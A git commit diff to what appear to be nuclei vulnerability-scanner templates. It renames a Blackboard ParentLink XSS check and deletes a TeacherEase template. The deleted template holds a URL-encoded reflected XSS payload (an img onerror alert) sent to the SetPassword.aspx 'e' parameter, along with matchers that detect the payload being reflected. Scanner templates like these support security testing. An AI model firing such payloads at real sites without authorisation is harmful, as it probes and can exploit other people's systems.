few updates

patch-1
sandeep 2021-03-14 17:07:52 +05:30
parent 655308b864
commit e18b34cc64
2 changed files with 2 additions and 32 deletions

View File

@ -1,7 +1,7 @@
id: parentlink-xss
info:
name: Blackboard ParentLink XSS
name: Blackboard ParentLink Reflected XSS
author: r3naissance
severity: medium
tags: blackboard,parentlink,xss
@ -28,4 +28,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -1,30 +0,0 @@
id: teacherease-xss
info:
name: Common Goal Systems (TeacherEase) XSS
author: r3naissance
reference: https://www.teacherease.com/home.aspx
severity: medium
tags: cgs,common,teacherease,xss
requests:
- method: GET
path:
- '{{BaseURL}}/SetPassword.aspx?e=%22%3E%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
matchers-condition: and
matchers:
- type: word
words:
- '%22%3E%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200